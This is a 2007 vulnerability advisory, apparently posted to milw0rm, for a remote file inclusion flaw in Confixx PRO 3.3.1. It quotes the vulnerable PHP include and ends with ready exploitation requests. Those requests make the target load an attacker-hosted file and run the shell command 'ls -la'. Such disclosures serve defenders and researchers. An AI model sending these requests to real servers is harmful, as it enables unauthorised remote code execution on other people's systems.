39 lines
No EOL
1.2 KiB
Text
39 lines
No EOL
1.2 KiB
Text
[*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
|
|
__________________________________________________________________________
|
|
|
|
[!] Application homepage : http://www.swsoft.com/de/products/confixx/
|
|
[!] Author : H4 / XPK
|
|
[!] Contact : http://xpkzxc.com/
|
|
[!] Bug discovered : 2007-07-21
|
|
[!] Bug published : 2007-07-24
|
|
[!] Risk : Moderate
|
|
|
|
Do not forget visit our page for new vulnerabilites , information and tools.
|
|
|
|
---------------------------------------------------------------------
|
|
|
|
Vuln. code: admin/business_inc/saveserver.php
|
|
|
|
Lines 8-11
|
|
|
|
if( !in_array($returnto, $actions) )
|
|
{
|
|
include( $thisdir . "/business_inc/list.php" );
|
|
}
|
|
|
|
Variable $thisdir is not defined ...
|
|
|
|
---------------------------------------------------------------------
|
|
|
|
An attacker does not need to be authenticated to access this file.
|
|
|
|
[!] Conditions: open_basedir restriction off and allow_url_fopen = on
|
|
|
|
[!] Exploitation : http://[target]/admin/business_inc/saveserver.php
|
|
|
|
Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la
|
|
Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la
|
|
|
|
---------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2007-07-24] |